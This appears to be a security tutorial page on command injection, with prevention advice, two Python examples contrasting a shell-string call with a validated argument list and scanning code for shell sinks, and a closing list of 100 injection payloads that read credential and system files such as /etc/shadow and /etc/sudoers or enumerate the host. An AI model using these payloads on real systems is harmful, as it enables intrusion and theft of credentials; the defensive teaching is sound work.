Command Injection

Command injection is an attack whose goal is to execute system commands on a host machine through a vulnerable application. It is one of the most common web application vulnerabilities and occurs when untrusted data is sent to an interpreter as part of a command or query.

1. What is Command Injection?

In a command injection attack, an attacker executes arbitrary system commands on a vulnerable host by injecting them into an application, which then runs them on the host. Command injection is one of the most common web application vulnerabilities and can lead to serious consequences such as data leakage, privilege escalation, and system compromise.

2. How Does Command Injection Work?

Command injection attacks occur when an application passes untrusted data to an interpreter as part of a command or query. The attacker injects malicious commands into the application, which are then executed on the host system. This can be done through user input fields, file uploads, and other vulnerable areas of the application.

3. What Are the Effects of Command Injection?

Command injection attacks can have serious consequences, including data leakage, privilege escalation, and system compromise. Command injection can also be used to gain access to sensitive data, execute malicious code, and launch denial of service attacks.

4. How Can You Prevent Command Injection?

To prevent command injection attacks, validate user input properly: sanitize and filter all user input so that it cannot carry malicious code. Limit the privileges of the application so that it cannot execute commands that could be used in an attack. Finally, perform regular security audits to identify potential vulnerabilities.
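The difference between passing input through a shell and passing it as a validated argument, shown as an added example that is not part of the original page. It assumes a POSIX host; `echo` stands in for a real tool such as a DNS lookup, and the function names are hypothetical.

```python
import re
import subprocess

# Strict allowlist for the one thing this feature accepts: a DNS hostname.
# Labels are alphanumeric with inner hyphens, so a leading "-" (which a tool
# could read as an option) and every shell metacharacter are rejected.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")


def lookup_vulnerable(host: str) -> str:
    """BEFORE: untrusted text is concatenated into a string parsed by /bin/sh."""
    proc = subprocess.run("echo resolving " + host, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def lookup_hardened(host: str) -> str:
    """AFTER: validate against the allowlist, then pass an argument vector.

    With a list and shell=False (the default) no shell parses the value, so
    ";", "&", "|" and "$" are plain characters inside one argument.
    """
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError("rejected: not a valid hostname")
    proc = subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True, timeout=5, check=True)
    return proc.stdout


def demo() -> dict:
    hostile = "example.com; echo INJECTED"   # constructed test input
    out = {"vulnerable": lookup_vulnerable(hostile)}
    try:
        lookup_hardened(hostile)
        out["hardened"] = "accepted"
    except ValueError as exc:
        out["hardened"] = str(exc)
    out["benign"] = lookup_hardened("example.com")
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The argument vector removes the shell from the path, and the allowlist covers what the vector alone does not: values that the called program itself would interpret, such as a leading hyphen.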

How to Find Command Injection

The most effective way to find command injection vulnerabilities is to perform a comprehensive security audit of the web application. During the audit, security professionals should look for any areas of the application where user input is accepted and then passed to an interpreter. These areas should be closely examined to ensure that they are properly sanitized and filtered to prevent malicious code from being injected. Additionally, security professionals should look for any areas of the application where privileged commands can be executed. These areas should be closely monitored and any suspicious activity should be investigated.
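One way to automate the first pass of such an audit for a Python code base, as an added example that is not from the original page: it walks the syntax tree and reports calls that hand a non-constant string to a shell. The sample source and function names are constructed for illustration.

```python
import ast

# Standard-library calls that always run their argument through a shell.
SHELL_SINKS = {"os.system", "os.popen",
               "subprocess.getoutput", "subprocess.getstatusoutput"}
# Calls that use a shell only when shell= is set to something other than False.
SUBPROCESS_CALLS = {"subprocess.run", "subprocess.call", "subprocess.Popen",
                    "subprocess.check_call", "subprocess.check_output"}

# Constructed sample of application code to audit.
SAMPLE = '''
import os, subprocess
def ping(host):
    os.system("ping -c 1 " + host)
def listing(path):
    subprocess.run(f"ls -l {path}", shell=True)
def uptime():
    subprocess.run("uptime", shell=True)
def safe(path):
    subprocess.run(["ls", "-l", path])
'''


def dotted_name(node):
    """Return 'pkg.func' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_shell_sinks(source):
    """List (line, call) where a non-literal first argument reaches a shell.

    Limits: positional command argument only, and import aliases such as
    'from subprocess import run' are not resolved.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        name = dotted_name(node.func)
        shell_on = any(
            kw.arg == "shell" and not (isinstance(kw.value, ast.Constant)
                                       and kw.value.value is False)
            for kw in node.keywords)
        via_shell = name in SHELL_SINKS or (name in SUBPROCESS_CALLS and shell_on)
        if via_shell and not isinstance(node.args[0], ast.Constant):
            findings.append((node.lineno, name))
    return sorted(findings)
```

Each finding is a place to review by hand: the constant `"uptime"` call and the list-form call are not reported because no variable text reaches a shell there.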

Parameters To Find Command Injection

When searching for command injection vulnerabilities, it is important to consider the following parameters:

1. User Input: All user input should be carefully examined to ensure that it does not contain any malicious code.

2. Privileged Commands: Security professionals should look for any areas of the application where privileged commands can be executed. Any suspicious activity should be investigated.

3. Authentication: Authentication should be used to ensure that only authorized users are able to access sensitive areas of the application.

4. Logging: Logging should be enabled to monitor all activity on the system and identify any potential attacks.

5. Encryption: Encryption should be used to protect sensitive data and communications.

100 Command Injection Payloads

1. ;cat /etc/passwd
2. & whoami
3. | wc -l
4. && ls -al
5. $ ls -lah
6. ; ls -al
7. | grep -i password
8. & find / -type f -name "*.conf"
9. | find / -name "*.txt"
10. && find / -type f -name "*.log"
11. $ sort /etc/passwd
12. ; sort /etc/shadow
13. & cat /proc/version
14. | cat /etc/issue
15. && cat /etc/hosts
16. $ cat /etc/resolv.conf
17. ; echo "test"
18. & echo "test" > /tmp/test.txt
19. | ps aux
20. && ps -ef
21. $ netstat -anp
22. ; netstat -tulpn
23. & who
24. | whoami
25. && env
26. $ env | grep -i path
27. ; cat /etc/services
28. & cat /etc/group
29. | cat /root/.bashrc
30. && cat /root/.profile
31. $ cat /etc/sudoers
32. ; ls -alh /etc/ssh
33. & ls -alh /root
34. | ls -alh /home
35. && ls -alh /var/log
36. $ cat /proc/cpuinfo
37. ; cat /proc/meminfo
38. & cat /proc/loadavg
39. | cat /proc/stat
40. && cat /proc/net/dev
41. $ cat /proc/net/arp
42. ; cat /proc/net/route
43. & cat /proc/net/ip_mr_cache
44. | cat /proc/net/ip_conntrack
45. && cat /proc/net/ipv6_route
46. $ cat /proc/net/ipv6_mr_cache
47. ; cat /proc/net/ipv6_conntrack
48. & cat /proc/net/icmp
49. | cat /proc/net/igmp
50. && cat /proc/net/raw
51. $ cat /proc/net/raw6
52. ; cat /proc/net/udp
53. & cat /proc/net/udp6
54. | cat /proc/net/tcp
55. && cat /proc/net/tcp6
56. $ cat /proc/sys/net/ipv4/ip_forward
57. ; cat /proc/sys/net/ipv4/conf/all/rp_filter
58. & cat /proc/sys/net/ipv4/icmp_echo_ignore_all
59. | cat /proc/sys/net/ipv6/conf/all/disable_ipv6
60. && cat /proc/sys/net/ipv6/conf/default/disable_ipv6
61. $ cat /proc/sys/net/ipv4/conf/default/accept_redirects
62. ; cat /proc/sys/net/ipv4/conf/all/accept_source_route
63. & cat /proc/sys/net/ipv6/conf/default/accept_redirects
64. | cat /proc/sys/net/ipv6/conf/all/accept_source_route
65. && ip route show
66. $ ip route show table all
67. ; ip route show table local
68. & ip route show table main
69. | ip route show table default
70. && ip rule show
71. $ ip -6 rule show
72. ; ip -6 route show table main
73. & ip -6 route show table local
74. | ip -6 route show table default
75. && ip -s link
76. $ ip -s addr
77. ; ip -s route
78. & ip -s neigh
79. | ip -s rule
80. && ip -s maddr
81. $ ip -s mroute
82. ; ip -s mrule
83. & ip -6 tunnel show
84. | ip -6 tunnel show table
85. && ip -6 tunnel show table main
86. $ ip -6 tunnel show table local
87. ; ip -6 tunnel show table default
88. & ip -6 tunnel show table all
89. | ip link show
90. && ip addr show
91. $ ip route show
92. ; ip route show table
93. & ip neigh show
94. | ip rule show
95. && ip maddr show
96. $ ip mroute show
97. ; ip mrule show
98. & ip -s link show
99. | ip -s addr show
100. && ip -s route show
